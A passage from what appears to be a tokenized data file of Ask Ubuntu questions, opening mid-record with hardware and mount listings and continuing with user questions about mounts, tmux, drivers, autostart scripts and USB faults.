febffc00-febfffff *-disk description : ata disk product : hitachi hts54251 vendor : hitachi physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : bb2o serial : 080406bb2200wbe03nwa size : 111gib ( 120gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=552d552d *-volume:0 description : ext4 volume vendor : linux physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 logical name : / version : 1.0 serial : 5baf7d64-fd37-4711-9759-753571d2f88b size : 20gib capacity : 20gib capabilities : primary bootable journaled extended_attributes large_files huge_files dir_nlink recover extents ext4 ext2 initialized configuration : created=2012-09-20 16:08:52 filesystem=ext4 label=kubuntu lastmountpoint=/ modified=2012-09-20 16:45:32 mount.fstype=ext4 mount.options=rw , relatime , errors=remount-ro , user_xattr , barrier=1 , data=ordered mounted=2013-09-27 12:29:31 state=mounted *-volume:1 description : linux swap volume physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 version : 1 serial : b1a54e61-6106-4c1d-8516-7f77f23e1a23 size : 3906mib capacity : 3906mib capabilities : primary nofs swap initialized configuration : filesystem=swap pagesize=4096 *-volume:2 description : ext3 volume vendor : linux physical id : 3 bus info : scsi @ 0:0.0.0,3 logical name : /dev/sda3 logical name : /home version : 1.0 serial : fd3ab5b0-380b-4edc-9d52-094ce4db6328 size : 87gib capacity : 87gib capabilities : primary journaled extended_attributes large_files recover ext3 ext2 initialized configuration : created=2008-07-14 19:39:01 filesystem=ext3 modified=2013-09-27 12:29:33 mount.fstype=ext3 mount.options=rw , relatime , errors=continue , barrier=1 , data=ordered mounted=2013-09-27 12:29:33 state=mounted *-usb:0 description : usb controller product : sb600 usb ( ohci0 ) vendor : hynix semiconductor ( hyundai electronics ) physical id : 13 bus info : pci @ 0000:00:13.0 version : 00 width : 32 bits clock : 66mhz capabilities : ohci bus_master configuration : driver=ohci_hcd latency=64 resources : irq:16 memory : febfe000-febfefff *-usb:1 description : usb controller product : sb600 usb ( ohci1 ) vendor : hynix semiconductor ( hyundai electronics ) physical id : 13.1 bus info : pci @ 0000:00:13.1 version : 00 width : 32 bits clock : 66mhz capabilities : ohci bus_master configuration : driver=ohci_hcd latency=64 resources : irq:17 memory : febfd000-febfdfff *-usb:2 description : usb controller product : sb600 usb ( ohci2 ) vendor : hynix semiconductor ( hyundai electronics ) physical id : 13.2 bus info : pci @ 0000:00:13.2 version : 00 width : 32 bits clock : 66mhz capabilities : ohci bus_master configuration : driver=ohci_hcd latency=64 resources : irq:18 memory : febfc000-febfcfff *-usb:3 description : usb controller product : sb600 usb ( ohci3 ) vendor : hynix semiconductor ( hyundai electronics ) physical id : 13.3 bus info : pci @ 0000:00:13.3 version : 00 width : 32 bits clock : 66mhz capabilities : ohci bus_master configuration : driver=ohci_hcd latency=64 resources : irq:17 memory : febfb000-febfbfff *-usb:4 description : usb controller product : sb600 usb ( ohci4 ) vendor : hynix semiconductor ( hyundai electronics ) physical id : 13.4 bus info : pci @ 0000:00:13.4 version : 00 width : 32 bits clock : 66mhz capabilities : ohci bus_master configuration : driver=ohci_hcd latency=64 resources : irq:18 memory : febfa000-febfafff *-usb:5 description : usb controller product : sb600 usb controller ( ehci ) vendor : hynix semiconductor ( hyundai electronics ) physical id : 13.5 bus info : pci @ 0000:00:13.5 version : 00 width : 32 bits clock : 66mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=64 resources : irq:19 memory : febff800-febff8ff *-serial unclaimed description : smbus product : sbx00 smbus controller vendor : hynix semiconductor ( hyundai electronics ) physical id : 14 bus info : pci @ 0000:00:14.0 version : 13 width : 32 bits clock : 66mhz configuration : latency=0 resources : ioport : b00 ( size=16 ) *-ide description : ide interface product : sb600 ide vendor : hynix semiconductor ( hyundai electronics ) physical id : 14.1 bus info : pci @ 0000:00:14.1 version : 00 width : 32 bits clock : 66mhz capabilities : ide bus_master configuration : driver=pata_atiixp latency=64 resources : irq:16 ioport:1f0 ( size=8 ) ioport:3f6 ioport:170 ( size=8 ) ioport:376 ioport : ff00 ( size=16 ) *-multimedia description : audio device product : sbx00 azalia ( intel hda ) vendor : hynix semiconductor ( hyundai electronics ) physical id : 14.2 bus info : pci @ 0000:00:14.2 version : 00 width : 64 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : driver=snd_hda_intel latency=64 resources : irq:16 memory : febf4000-febf7fff *-isa description : isa bridge product : sb600 pci to lpc bridge vendor : hynix semiconductor ( hyundai electronics ) physical id : 14.3 bus info : pci @ 0000:00:14.3 version : 00 width : 32 bits clock : 66mhz capabilities : isa bus_master configuration : latency=0 *-pci:5 description : pci bridge product : sbx00 pci to pci bridge vendor : hynix semiconductor ( hyundai electronics ) physical id : 14.4 bus info : pci @ 0000:00:14.4 version : 00 width : 32 bits clock : 66mhz capabilities : pci subtractive_decode bus_master resources : ioport : a000 ( size=8192 ) memory : fca00000-feafffff memory : cff00000-dfefffff *-pcmcia description : cardbus bridge product : rl5c476 ii vendor : ricoh co ltd physical id : 1 bus info : pci @ 0000:08:01.0 version : b4 width : 64 bits clock : 33mhz capabilities : pcmcia bus_master cap_list configuration : driver=yenta_cardbus latency=176 maxlatency=5 mingnt=128 resources : iomemory : b00c09080-b00c0907f irq:21 memory:38000000-38000fff ioport : a400 ( size=256 ) ioport : a000 ( size=256 ) memory : d0000000-d3ffffff memory:3c000000-3fffffff *-generic:0 description : sd host controller product : r5c822 sd/sdio/mmc/ms/mspro host adapter vendor : ricoh co ltd physical id : 1.1 bus info : pci @ 0000:08:01.1 version : 18 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : driver=sdhci-pci latency=64 resources : irq:23 memory : feaffc00-feaffcff *-generic:1 description : system peripheral product : r5c592 memory stick bus host adapter vendor : ricoh co ltd physical id : 1.2 bus info : pci @ 0000:08:01.2 version : 09 width : 32 bits clock : 33mhz capabilities : pm cap_list configuration : driver=r592 latency=0 resources : irq:23 memory : feaff800-feaff8ff *-network description : ethernet interface product : rtl-8139/8139c/8139c+ vendor : realtek semiconductor co. , ltd. physical id : 7 bus info : pci @ 0000:08:07.0 logical name : eth0 version : 10 serial : 00:1f : c6:87:94:76 size : 100mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=8139too driverversion=0.9.28 duplex=full ip=192.168.2.100 latency=64 link=yes maxlatency=64 mingnt=32 multicast=yes port=mii speed=100mbit/s resources : irq:20 ioport : b800 ( size=256 ) memory : feaff400-feaff4ff sudo wodim -- devices output : wodim : overview of accessible drives ( 0 found ) : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - sudo lsmod output : module size used by rfcomm 38139 0 bnep 17830 2 parport_pc 32114 0 bluetooth 158479 10 rfcomm , bnep ppdev 12849 0 dm_crypt 22528 0 snd_hda_codec_si3054 12864 1 snd_hda_codec_realtek 174313 1 snd_hda_intel 32719 3 snd_hda_codec 109562 3 snd_hda_codec_si3054 , snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13276 1 snd_hda_codec snd_pcm 80916 3 snd_hda_codec_si3054 , snd_hda_intel , snd_hda_codec pcmcia 39826 0 snd_seq_midi 13132 0 snd_rawmidi 25424 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51592 2 snd_seq_midi , snd_seq_midi_event snd_timer 28931 2 snd_pcm , snd_seq snd_seq_device 14172 3 snd_seq_midi , snd_rawmidi , snd_seq psmouse 86520 0 arc4 12473 2 r592 17808 0 serio_raw 13027 0 yenta_socket 27465 0 snd 62218 16 snd_hda_codec_si3054 , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device pcmcia_rsrc 18367 1 yenta_socket memstick 15857 1 r592 pcmcia_core 21511 3 pcmcia , yenta_socket , pcmcia_rsrc soundcore 14635 1 snd sp5100_tco 13495 0 i2c_piix4 13093 0 usblp 17885 0 snd_page_alloc 14108 2 snd_hda_intel , snd_pcm joydev 17393 0 ath5k 145127 0 ath 19387 1 ath5k mac80211 436493 1 ath5k asus_laptop 23693 0 sparse_keymap 13658 1 asus_laptop mac_hid 13077 0 input_polldev 13648 1 asus_laptop shpchp 32265 0 cfg80211 178877 3 ath5k , ath , mac80211 lp 17455 0 parport 40930 3 parport_pc , ppdev , lp sdhci_pci 18324 0 usbhid 41937 0 hid 77428 1 usbhid radeon 738031 2 8139too 23283 0 8139cp 26759 0 sdhci 28241 1 sdhci_pci ttm 65344 1 radeon drm_kms_helper 45466 1 radeon pata_atiixp 12999 0 drm 197641 4 radeon , ttm , drm_kms_helper i2c_algo_bit 13199 1 radeon video 19115 0 ati_agp 13242 0 sudo mount output : /dev/sda1 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) /dev/sda3 on /home type ext3 ( rw )
350716	mount directory for non-admin users on a dual boot setup	i have a dual boot pc ( ubuntu 12.04 with gnome , windows vista ) and admin uses all drives , including the c drive of windows . i would like to allow standard-privileged users to be able to read ( not write , only access a document ) a single subdirectory named a from the drive c. so , in /etc/fstab file , /media/123 ... /a ( c : \a in windows ) should be linked to the users ' documents/a directory ( /home/user/documents/a ) , only for standard users ( not admins ) . this should include the subdirectories of a too and all files . is there a way to do it ? thank you in advance !
350718	problem regarding tmux copy mode	tmux version : tmux 1.7 terminal : gnome-terminal version 3.6.1 configuration file contents ~/.tmux.conf : set-window-option -g mode-keys vi set-option -g status-keys vi when i enter 'copy-mode ' , select text and copy selection , it leave 'copy-mode ' and switch to normal mode . expected behaviour is to continue 'copy-mode ' until we leave it by pressing 'q ' . following are step i am following : 1 ) open terminal and execute some command like 'ls /etc/' 2 ) now enter into copy mode by pressing `` ctrl-b [ `` ( control-b followed by [ ) 3 ) goto to desired location with navigation keys . 4 ) now begin selection by pressing `` space '' key . use navigation keys for desired text selection . 5 ) press 'enter ' to copy selection . when we press 'enter ' , it will copy selection , leave copy-mode and return to normal mode . i am expecting copy-mode to continue until i press 'q ' to abort copy-mode . if i wanted to navigate through scroll buffer further , i need enter into copy-mode again . following is key binding listing for vi-copy mode ( by default ) $ tmux list-keys -t vi-copy bind-key -t vi-copy c-b page-up bind-key -t vi-copy c-c cancel bind-key -t vi-copy c-e scroll-down bind-key -t vi-copy c-f page-down bind-key -t vi-copy c-h cursor-left bind-key -t vi-copy enter copy-selection bind-key -t vi-copy c-y scroll-up bind-key -t vi-copy escape clear-selection bind-key -t vi-copy space begin-selection bind-key -t vi-copy $ end-of-line bind-key -t vi-copy , jump-reverse bind-key -t vi-copy / search-forward bind-key -t vi-copy 0 start-of-line bind-key -t vi-copy 1 start-number-prefix bind-key -t vi-copy 2 start-number-prefix bind-key -t vi-copy 3 start-number-prefix bind-key -t vi-copy 4 start-number-prefix bind-key -t vi-copy 5 start-number-prefix bind-key -t vi-copy 6 start-number-prefix bind-key -t vi-copy 7 start-number-prefix bind-key -t vi-copy 8 start-number-prefix bind-key -t vi-copy 9 start-number-prefix bind-key -t vi-copy : goto-line bind-key -t vi-copy ; jump-again bind-key -t vi-copy ? search-backward bind-key -t vi-copy b previous-space bind-key -t vi-copy d copy-end-of-line bind-key -t vi-copy e next-space-end bind-key -t vi-copy f jump-backward bind-key -t vi-copy g history-bottom bind-key -t vi-copy h top-line bind-key -t vi-copy j scroll-down bind-key -t vi-copy k scroll-up bind-key -t vi-copy l bottom-line bind-key -t vi-copy m middle-line bind-key -t vi-copy n search-reverse bind-key -t vi-copy t jump-to-backward bind-key -t vi-copy w next-space bind-key -t vi-copy ^ back-to-indentation bind-key -t vi-copy b previous-word bind-key -t vi-copy e next-word-end bind-key -t vi-copy f jump-forward bind-key -t vi-copy g history-top bind-key -t vi-copy h cursor-left bind-key -t vi-copy j cursor-down bind-key -t vi-copy k cursor-up bind-key -t vi-copy l cursor-right bind-key -t vi-copy n search-again bind-key -t vi-copy q cancel bind-key -t vi-copy t jump-to-forward bind-key -t vi-copy v rectangle-toggle bind-key -t vi-copy w next-word bind-key -t vi-copy bspace cursor-left bind-key -t vi-copy npage page-down bind-key -t vi-copy ppage page-up bind-key -t vi-copy up cursor-up bind-key -t vi-copy down cursor-down bind-key -t vi-copy left cursor-left bind-key -t vi-copy right cursor-right bind-key -t vi-copy c-up scroll-up bind-key -t vi-copy c-down scroll-down is it default behaviour ? if yes then how can i change it ? any expert opinion will be helpful .
350721	how to access network shares ?	i am using intranet using run command in windows by directly typing the intranet address like \172.16.0.11 and pressing enter . then a tab opens for username and password . in ubuntu 12.04 how can i open internet ?
350722	safe to install nvidia drivers with my setup ?	i 'm running ubuntu 13.04 with optirun/primusrun installed , and i 'm experiencing a lot of xorg crashes ( both in unity and gnome 3.8 ) , and i want to install the nvidia drivers , as i 'm currently using the standard intel drivers . is it safe for me to install the nvidia drivers through their installer ? or is it better to install them through apt-get ? and what do i do if it fails to boot ? extra info : gpu : intel/nvidia geforce 520mx ( optimus card )
350723	custom launcher in ubuntu 12.04 xdg/autostart	i have some script that should start when user logs in . i 've created .desktop file and put it into /etc/xdg/autostart . it works on two pretty old pcs with ubuntu with a long life ( 10.xx - > 11.10 - > 12.04 at the moment ) , and does n't work on freshly installed ubuntu 12.04 . .desktop file works correctly - it starts what i want when i double click it . here it is : [ desktop entry ] version=1.0 type=application exec=/usr/bin/proxyauth.sh icon=utilities-terminal startupnotify=false terminal=true nodisplay=false name=proxy authentication comment=use the command line is there any way i can debug or track what happens on login ? thanks !
350724	accidently installed two versions of swi-prolog , need help to fix it	alright , i have this problem where i installed two different versions of swi-prolog . i manually installed swi-prolog ( swipl ) version 5.10.4 from a tar-file , which i see now is a stupid thing . ( i ca n't remember why i did this exactly , but that is besides the point . ) then i wanted to get the newest version of prolog , so i followed these steps : sudo apt-add-repository ppa : swi-prolog/stable sudo apt-get update sudo apt-get install swi-prolog now if i do swipl -- version i get swi-prolog version 5.10.4 for x86_64-linux and if i do /usr/bin/swipl -- version i get swi-prolog version 6.4.1 for amd64 i only want the 6.4.1 version on my computer . i searched the internet for hours , but i could n't find out how to solve the problem . ( maybe i 've been searching for the wrong terms/tags , i do n't know.. ) so , i found out that the 5.10.4 version can be found at /usr/local/bin/ whereas the 6.4.1 version is at /usr/bin/ . ca n't i just rm the 5.10.4 version from /usr/local/bin/ then ? or is that not clean , e.g . does it leave obsolete files somewhere on disk ? i just deleted the file swipl at /usr/local/bin/swipl with the rm-command . now i get the 6.4.1 version whenever i call swipl , but i still wonder if this is a good solution . the output of type swipl is swipl is /usr/local/bin/swipl and the output of dpkg -s $ ( type swipl | awk ' { print $ 3 } ' ) is dpkg-query : no path found matching pattern /usr/local/bin/swipl . i untarred the .tar-file and i ran make from the source ( src folder ) that was in the .tar-file . then installed the program using sudo make install .
350728	installing d-link dw-125 wireless adapter on 12.04	i believe ububtu is not for nerds alone ; hence installed ubuntu . i have ubuntu 12.04 installed on my 64-bit machine . after the system failed to recognize my d-link dwa-125 wireless adapter , i got it to work following the instructions mentioned here : http : //kaustav.codebinders.com/2011/10/install-dwa-125-wireless-driver-on-ubuntu-11-10.html however , the problem is that the system forgets about this installation on shutdown . upon restart , it does not recognize the device and i have to install it all over again . is there any solution to this problem ? a step by step instruction would be useful as i do n't know linux commands .
350731	file specific privacy	how do i encrypt specific files with minimum fuss and bother ? i have followed various instructions with more or less the same result ; i end up with a folder named 'private ' . i need a folder that i need to password enable .
350734	unable to mount store . error mounting : mount exited with exit code 2:	today i wanted to open a media ( ntfs ) partition named `` store '' but this error displayed : unable to mount store error mounting : mount exited with exit code 2 : there are very important data for me on this partition , how can i mount it again accurately without losing any data ?
350735	how to install pythonika on ubuntu ?	i tried to install pythonika on my ubuntu 13.04 , but i failed to find a possible file and a possible way to do it . any help will be appreciated !
350737	merging unallocated partition in usb drive	i am totally new to linux . i have a 1 gb usb pen drive . some windows virus created a 1.4mb partition in it and copied itself in it . i want to delete that partition or merge it with the rest of the drive space . i would 've posted screenshot , but that is not allowed : (
350738	phablet-flash : installation is taking too long	i 've been trying to flash ubuntu touch to a nexus 4 , following the instructions on this page . i 'm running this command : phablet-flash ubuntu-system -- channel devel -- no-backup ... and after doing whatever it needs to do , i get this message : info : phablet-flash : waiting for install to finish on device . please do not unplug device until phablet-flash finishes . but after waiting for quite some time i get this error : error : phablet-flash : installation is taking too long or an error occured along the way . i ca n't find any way to tell the process to spend even more time . can anyone help me get past this error ? update sep. 30th i tried switching on the phone , despite the error , and it actually looked like the flashing succeeded . everything seemed to be working as expected .
350741	i ca n't detect any wireless in my laptop	my ubuntu is 13.04 . some time ago , it can detect some wireless hotspots ( still some ca n't be detected ) . to find all hotspots , i try to modify the setting and try to install some driver manually for my computer . however , sadly to speaking , it ca n't find any hotspots currently . i do n't know what is wrong . wireless card : broadcom corporation : bcm4313 802.11b/g/n . in additional drivers , it shows the device is not working .
350745	does palaver voice input work on kubuntu ?	i installed palaver using instructions found in the following video and web page on kubuntu 13.04 . i have set up a ctrl+l keyboard short-cut . whenever i press the short-cut however , nothing seems to happen . i ca n't see any active application the system monitor , nothing , no sign of life at all . can it work at all on kubuntu ? if it does , how do i make this work ?
350746	configuring grub-pc for upgrade	i was upgrading my ubuntu and the upgrade stopped with the following message . the grub boot loader was previously installed to a disk that is no longer present , or whose unique identifier has changed for some reason . it is important to make sure that the installed grub core image stays in sync with grub modules and grub.cfg . please check . i have no idea how to check this . this computer was given to me by my sister .
350751	install and run python 3 at the same time than python 2	im using 13.04 but i want have installed the both main python versions for make tests about migration of my actual code . is possible install python 3 in the same machine running python 2.7 ? i need work with both versions , thanks !
350752	how to find corrupted config files ?	for some reason , some file ( s ) in ~/.config became corrupted and i got caught in the infinite login loop problem . i fixed this by moving these files into another directory . of course , now my desktop is reset ! it 's not a huge problem , in the grand scheme of things , but is there any way -- other than trial and error -- to isolate the buggy file and just keep all the good ones ?
350755	how to install ubuntu 12.04 with radeon tm hd 6470	i have hp pavilion g6 i5 laptop with radoen hd 6470m switchable vga . i installed it the ubuntu 12.04 lts but vga drivers does n't work properly . i want to install drivers into the ubuntu . please give good answer to instrall ubuntu
350758	ibus preferences is not shown in ubuntu 13.10	ibus preferences is not shown in ubuntu 13.10 , i already configured ibus to add new keyboard but it is not showing . ibus-setup command and it only shows next input method , there is not enable and disable option , how to fix this : )
350772	is there a hostsman like app for ubuntu	one way to keep malware and advertisements outside the door is by blocking the computers that serve this content ... . - tweakers.net tweakers.net ( dutch ) was talking about hostsman , according to them , can block the servers that are running malware advertisements and such . question : is there an app like that for ubuntu ?
350776	amd radeon hd 7400m series driver not found	where can i find the driver of amd radeon hd 7400m series for win 8 ... i tried too many times but can not find ... always this note has show that `` you hardware not compatible with your driver ''
350777	how to share files from ubuntu 13.04 and lubuntu 13.04 ?	i have been searching the forums and nothing is working on my pc's.here 's what i have done , first in both the edit connections tab in ubuntu & llubuntu 13.04 , i created a network with ip , netmask , and gateway . the gateway is the ip of the other pc.then i connected using this network . both can ping each other . now , i tried to connect from my lubuntu to ubuntu using this command ftp myusername @ other-pc-ip and i get a system error , and ftp other-pc-ip does n't work even if i enter the correct name and password . i can login with telnet from both pc there is no problem in telnet . i tried to use file zilla , but when i tried to drag and drop , there is 530 connection refused error . how should i proceed now ? my goal is to obtain a file from my ubuntu 13.04 to my lubuntu . ? please give reference to a step by step instruction to do file sharing from the begining . i did n't find any posts like this in google .
350778	my ubuntu not workin in compaq presario cq56	ubuntu 12.4 32 bit not working in my compaq presario cq56 . i tried dual boot . but what happened is ubuntu did not install showed error 5 . cd/dvd something . and my windows 7 did go off too . i currently dont have any os .
350781	does hauppauge wintvr 900h work with digital tv in the uk	i have been trying to sort out my hauppauge wintv 900h usb tuner . here in the uk , we do not have analogue tv any more as we are fully converted to digital . i have had this working in windows a while ago , but am having no joy in ubuntu 13.04 all i get is a blue screen and no settings for the uk . can anyone advise me how to set this up on my laptop . i have tried : does hauppauge wintv hvr-900 ( r2 ) [ usb id 2040:6502 ] work with ubuntu 12.04 lts ? i am using tvtime i have also read this page , which makes me think that this unit can only receive analogue signals , which are no longer transmitted in the uk ( which could be my problem ! ) laptop specifications : intel® core™ i3-2350m cpu @ 2.30ghz × 4 intel® sandybridge mobile 6mb ram any advice would be greatly appreciated .
350782	xubuntu installed when i was expecting ubuntu	yesterday , i downloaded and installed a ubuntu 13.04 ( using the minimised cd ) on a revo . everything worked fine , i quited liked it ( pretty new to linux ) , and i thought i 'd add it to my pc as a dual boot with windows 8 . so , i put the same cd in my pc , ran through the install , selecting exactly the same options ( except for the dual boot ) , but it 's different . when i booted ( selecting ubuntu from the grub menu ) , i was presented with a screen saying xbubtu . from what i understand it is designed primarily for machines that do not have the recommended specs for ubuntu , but not only is my pc considerably more powerful than the revo , i was never offered a choice . first and foremost , can anyone explain why this would have been installed and not the proper version of ubuntu ? and i 'd like to reiterate - until i started booting , xubuntu had not been mentioned , and and was certainly not asked if i 'd like to install that instead . next , i wonder how i can safely remove it ? i 'd like to not have to faff about fixing my mbr , so is there a way to safely remove xununtu without affecting it ? thanks .
350784	changing numeric language from konsole in kubuntu	how to change the numeric language to english from terminal & why the games are not working ?
350789	sound drivers for gateway e4300 for ubuntu 12.04	i have no sound driver for my system ( gateway e4300 ) on operating system ubuntu 12.04 desktop . what should i do ?
350791	usb ports die randomly	this affects all of my usb ports , back , front . the machine is still working fine . i can ssh into it from a different machine it just wont ' take any input from my usb device . i could use the computer for hours with no problems and other times it would die every 10 minutes . here 's the last tidbit of dmesg after my ports died . i tried keeping a minimal number of devices connected , but i need at the very least mouse , keyboard , wifi , and speakers plugin . it still dies . any suggestions on how to debug this ? i 'm looking for hints on what to try as much as solutions . [ 6.838793 ] type=1400 audit ( 1380292400.536:8 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/bin/quasselcore '' pid=1571 comm= '' apparmor_parser '' [ 6.838892 ] type=1400 audit ( 1380292400.536:9 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' pid=1565 comm= '' apparmor_parser '' [ 6.839066 ] type=1400 audit ( 1380292400.536:10 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper//chromium_browser '' pid=1565 comm= '' apparmor_parser '' [ 6.839171 ] type=1400 audit ( 1380292400.536:11 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/x86_64-linux-gnu/lightdm-remote-session-freerdp/freerdp-session-wrapper '' pid=1566 comm= '' apparmor_parser '' [ 6.839176 ] type=1400 audit ( 1380292400.536:12 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/x86_64-linux-gnu/lightdm-remote-session-uccsconfigure/uccsconfigure-session-wrapper '' pid=1567 comm= '' apparmor_parser '' [ 6.839445 ] type=1400 audit ( 1380292400.536:13 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/x86_64-linux-gnu/lightdm-remote-session-freerdp/freerdp-session-wrapper//chromium_browser '' pid=1566 comm= '' apparmor_parser '' [ 6.839449 ] type=1400 audit ( 1380292400.536:14 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/x86_64-linux-gnu/lightdm-remote-session-uccsconfigure/uccsconfigure-session-wrapper//chromium_browser '' pid=1567 comm= '' apparmor_parser '' [ 6.840039 ] type=1400 audit ( 1380292400.540:15 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=1573 comm= '' apparmor_parser '' [ 6.840368 ] type=1400 audit ( 1380292400.540:16 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/cupsd '' pid=1573 comm= '' apparmor_parser '' [ 6.840586 ] type=1400 audit ( 1380292400.540:17 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/mysqld '' pid=1574 comm= '' apparmor_parser '' [ 6.939828 ] init : avahi-cups-reload main process ( 1665 ) terminated with status 1 [ 6.951484 ] ppdev : user-space parallel port driver [ 7.000570 ] ipv6 : addrconf ( netdev_up ) : eth1 : link is not ready [ 7.000869 ] ipv6 : addrconf ( netdev_up ) : eth1 : link is not ready [ 7.148290 ] e1000e 0000:00:19.0 : irq 80 for msi/msi-x [ 7.252075 ] e1000e 0000:00:19.0 : irq 80 for msi/msi-x [ 7.252161 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 7.252434 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 7.809759 ] ipv6 : addrconf ( netdev_up ) : wlan1 : link is not ready [ 7.810039 ] ipv6 : addrconf ( netdev_up ) : wlan1 : link is not ready [ 7.810704 ] ipv6 : addrconf ( netdev_up ) : wlan1 : link is not ready [ 10.159150 ] ipv6 : addrconf ( netdev_change ) : wlan1 : link becomes ready [ 15.127430 ] vboxdrv : found 8 processor cores . [ 15.127505 ] vboxdrv : fasync=1 offmin=0x14998cbdb offmax=0x14998cbdb [ 15.127582 ] vboxdrv : tsc mode is 'asynchronous ' , kernel timer mode is 'normal ' . [ 15.127584 ] vboxdrv : successfully loaded version 4.2.18 ( interface 0x001a0005 ) . [ 15.333699 ] vboxpci : iommu not found ( not registered ) [ 467.137799 ] input : logitech unifying device . wireless pid:2010 as /devices/pci0000:00/0000:00:1c.3/0000:08:00.0/usb5/5-1/5-1.1/5-1.1:1.2/0003:046d : c52b.0003/input/input16 [ 467.138086 ] logitech-djdevice 0003:046d : c52b.0006 : input , hidraw3 : usb hid v1.11 keyboard [ logitech unifying device . wireless pid:2010 ] on usb-0000:08:00.0-1.1:1 [ 474.992393 ] audit_printk_skb : 54 callbacks suppressed [ 474.992396 ] type=1400 audit ( 1380292868.690:36 ) : apparmor= '' denied '' operation= '' open '' parent=3779 profile= '' /usr/lib/telepathy/mission-control-5 '' name= '' /media/data/raidhome/.config/libaccounts-glib/accounts.db '' pid=3780 comm= '' mission-control '' requested_mask= '' rwc '' denied_mask= '' rwc '' fsuid=1000 ouid=1000 [ 474.992403 ] type=1400 audit ( 1380292868.690:37 ) : apparmor= '' denied '' operation= '' open '' parent=3779 profile= '' /usr/lib/telepathy/mission-control-5 '' name= '' /media/data/raidhome/.config/libaccounts-glib/accounts.db '' pid=3780 comm= '' mission-control '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=1000 [ 475.072376 ] type=1400 audit ( 1380292868.770:38 ) : apparmor= '' denied '' operation= '' open '' parent=3779 profile= '' /usr/lib/telepathy/mission-control-5 '' name= '' /media/data/raidhome/.mission-control/accounts/accounts.cfg '' pid=3780 comm= '' mission-control '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=1000 [ 475.072471 ] type=1400 audit ( 1380292868.770:39 ) : apparmor= '' denied '' operation= '' mkdir '' parent=3779 profile= '' /usr/lib/telepathy/mission-control-5 '' name= '' /media/data/raidhome/.local/share/telepathy/ '' pid=3780 comm= '' mission-control '' requested_mask= '' c '' denied_mask= '' c '' fsuid=1000 ouid=1000 [ 475.073462 ] mission-control [ 3780 ] : segfault at 40 ip 00007f5a9b2c5af0 sp 00007fff87f08260 error 4 in libgobject-2.0.so.0.3600.0 [ 7f5a9b2af000+4d000 ] [ 475.929861 ] type=1400 audit ( 1380292869.626:40 ) : apparmor= '' denied '' operation= '' open '' parent=3821 profile= '' /usr/lib/telepathy/mission-control-5 '' name= '' /media/data/raidhome/.config/libaccounts-glib/accounts.db '' pid=3822 comm= '' mission-control '' requested_mask= '' rwc '' denied_mask= '' rwc '' fsuid=1000 ouid=1000 [ 475.929873 ] type=1400 audit ( 1380292869.626:41 ) : apparmor= '' denied '' operation= '' open '' parent=3821 profile= '' /usr/lib/telepathy/mission-control-5 '' name= '' /media/data/raidhome/.config/libaccounts-glib/accounts.db '' pid=3822 comm= '' mission-control '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=1000 [ 475.930227 ] type=1400 audit ( 1380292869.626:42 ) : apparmor= '' denied '' operation= '' open '' parent=3821 profile= '' /usr/lib/telepathy/mission-control-5 '' name= '' /media/data/raidhome/.mission-control/accounts/accounts.cfg '' pid=3822 comm= '' mission-control '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=1000 [ 475.930285 ] type=1400 audit ( 1380292869.626:43 ) : apparmor= '' denied '' operation= '' mkdir '' parent=3821 profile= '' /usr/lib/telepathy/mission-control-5 '' name= '' /media/data/raidhome/.local/share/telepathy/ '' pid=3822 comm= '' mission-control '' requested_mask= '' c '' denied_mask= '' c '' fsuid=1000 ouid=1000 [ 475.932277 ] mission-control [ 3822 ] : segfault at 40 ip 00007f1eb0ef3af0 sp 00007fff10aded00 error 4 in libgobject-2.0.so.0.3600.0 [ 7f1eb0edd000+4d000 ] [ 488.567141 ] init : plymouth-stop pre-start process ( 3893 ) terminated with status 1 [ 